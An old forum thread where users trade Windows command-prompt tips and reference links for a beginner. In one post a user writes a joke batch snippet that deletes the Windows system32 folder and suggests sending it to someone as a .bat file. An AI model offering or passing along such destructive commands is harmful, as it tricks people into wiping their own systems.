Current time: 08-23-2017, 01:02 AM Hello There, Guest! (LoginRegister)

Post Reply 
 
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
CMD Prompt.
05-11-2012, 10:05 PM
Post: #1
CMD Prompt.
Hi all.
I need to learn all CMD Prompt for Win7. Including their functions.

All help would be appreciated as i'm retarded in the sense that i keep forgetting what i already know Wink

Regards as always.

My Torrents Are HERE And HERE Big GrinYay
Visit this user's website Find all posts by this user
Quote this message in a reply
05-11-2012, 10:18 PM
Post: #2
RE: CMD Prompt.
cmd as in command line?

"Yeah. I understand the mechanics of it, shithead. I just don't understand how this is any less retarded than what I'm suggesting." - Kiley; Housebound.
Find all posts by this user
Quote this message in a reply
05-12-2012, 12:48 AM
Post: #3
RE: CMD Prompt.
http://pcsupport.about.com/od/commandlin...ds-p1.htm\
http://commandwindows.com/windows7-commands.htm

[Image: fdhgsdssff.jpg]
May My Light guides you
Find all posts by this user
Quote this message in a reply
05-12-2012, 07:29 AM
Post: #4
RE: CMD Prompt.
Yep!!

[Image: clLo3.jpg]

My Torrents Are HERE And HERE Big GrinYay
Visit this user's website Find all posts by this user
Quote this message in a reply
05-12-2012, 07:47 AM
Post: #5
RE: CMD Prompt.
edit autoexec.bat


@echo one does not simply cd..

"Yeah. I understand the mechanics of it, shithead. I just don't understand how this is any less retarded than what I'm suggesting." - Kiley; Housebound.
Quote this message in a reply
05-12-2012, 11:21 AM
Post: #6
RE: CMD Prompt.
Okay this thread is a little shaky . . . how about we post comman-line tips and tricks and move it to Help Section? What say ye OP?

To send the output of a DOS command to a file, just use this code:

Code:
command > filename

where command is any DOS command that produces output to the screen

and filename is any valid filename or path.

It is very handy for grabbing information from tracrt's and directory listings . . .

Wildcard is awesome.
Find all posts by this user
Quote this message in a reply
05-12-2012, 09:01 PM
Post: #7
RE: CMD Prompt.
Fine with me Mark Smile

My Torrents Are HERE And HERE Big GrinYay
Visit this user's website Find all posts by this user
Quote this message in a reply
05-12-2012, 09:10 PM
Post: #8
RE: CMD Prompt.
(05-12-2012 07:47 AM)stormium Wrote:  edit autoexec.bat


@echo one does not simply cd..

Code:
C:

cd windows

del system 32/*.*

del system32


Would be nice to send someone as a .bat Wink

Now back on topic Smile

My Torrents Are HERE And HERE Big GrinYay
Visit this user's website Find all posts by this user
Quote this message in a reply
05-13-2012, 07:52 AM
Post: #9
RE: CMD Prompt.
argh... i ran a cmd on my mac yesterday while drunk and now my itunes ratings include half stars Angry

and the worst part is i can't remember how i did it and the logs are all fucked up Angry

"Yeah. I understand the mechanics of it, shithead. I just don't understand how this is any less retarded than what I'm suggesting." - Kiley; Housebound.
Find all posts by this user
Quote this message in a reply
05-13-2012, 12:26 PM
Post: #10
RE: CMD Prompt.
To get a directory list that pause on page-break(80 lines) then type

Code:
dir /p/o

Wildcard is awesome.
Find all posts by this user
Quote this message in a reply
Post Reply 




User(s) browsing this thread: 1 Guest(s)